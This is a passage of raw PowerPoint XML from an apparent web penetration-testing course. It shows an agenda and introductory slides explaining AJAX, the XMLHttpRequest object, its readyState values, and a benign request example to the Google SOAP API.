              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Asynchronous JavaScript </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and XML (AJAX)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="5181600" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AJAX is the technology enabling Web 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses JavaScript and XML to provide dynamic application functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Allows the application to refresh portions of the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This allows for more "thick" client type functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider Google Maps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It shows satellite images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It also includes road information with traffic data overlaid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AJAX allows for it to use interactive features while only updating the changed sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164868" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-12000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2133600"/>
            <a:ext cx="3162300" cy="3429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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Mighty XMLHttpRequest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1327673"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>The JavaScript XMLHttprequest object is the heart of AJAX  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>It allows a JavaScript to make requests for data in the background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Providing more interactivity to the web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Begin using the object with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp = new XMLHttpRequest();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" pitchFamily="-108" charset="-128"/>
              </a:rPr>
              <a:t>Main methods and properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.open("GET", "http://www.secureideas.com/index.php");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sets up the request method, where the request will go, and what it will retrieve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.send();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Actually sends the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.onreadystatechange = AJAXProcess</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sets which function should be called when the ready state changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A response being received is an example of a ready state change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>In this example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>AJAXProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>would be a custom function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.readyState</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The property that contains the current ready state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp.responseText</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>The property that contains the contents of any response from the server</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>readyState</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166915" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="1630680"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The readyState is a property of the XMLHttpRequest object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It provides information about the state of the server's response to a request sent via XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The readyState has 5 possible values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 0: The request is uninitialized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 1: The request has been set up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 2: The request has been sent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 3: Waiting for a response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 4: The response is complete</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Our code uses this to take certain actions when the response has been returned</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="106680"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example Use of XMLHttpRequest:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Query Google Using SOAP API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335878" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="5029200" cy="4038600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>xmlhttp = new XMLHttpRequest();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>search=“Professionally Evil"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> xmlhttp.open("POST", "http://api.google.com/search/beta2",true);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> xmlhttp.onreadystatechange=function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182563" lvl="1" eaLnBrk="0" hangingPunct="0">
